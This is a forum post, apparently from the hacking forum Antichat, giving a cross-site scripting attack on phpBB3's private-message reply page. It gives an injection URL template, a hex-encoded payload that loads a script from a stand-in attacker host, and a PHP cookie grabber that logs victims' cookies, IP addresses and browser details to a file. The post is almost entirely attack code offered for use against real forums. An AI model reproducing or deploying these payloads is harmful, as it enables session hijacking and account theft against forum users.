Форум АНТИЧАТ - Показать сообщение отдельно

XSS Private Messagging On PhpBB3

http://www.victimesite.org/ucp.php?i=pm&mode=compose&action=reply&f=[xss]&p=[page]

Where is:

Цитата:

[xss] = '';!--"<script>alert(document.cookie);</script>=&{(alert(1))}
[page] = Page of your PM

Redirect Code [Ascii --> Hex]:

Цитата:

[xss] = %3c%73%63%72%69%70%74%20%73%72%63%3d%68%74%74%70%3 a%2f%2f%77%77%77%2e%65%76%69%6c%73%69%74%65%2e%6f% 72%67%2f%66%69%6c%65%2e%6a%73%3e
(<script src=http://www.evilsite.org/WaRWolFz/file.js>)

COOKIES GRABBER

Цитата:

<?php

$ip = $_SERVER['REMOTE_ADDR'];
$referer = $_SERVER['HTTP_REFERER'];
$agent = $_SERVER['HTTP_USER_AGENT'];

$data = $_GET['warwolfz'];
$time = date("Y-m-d G:i:s A");
$text = "Time: ".$time."\nIP:".$ip."\nReferer:".$referer."\nU ser-Agent:".$agent."\nCookie:".$data."\n\n";

$file = fopen('cookies.html' , 'a');
fwrite($file,$text);
fclose($file);

?>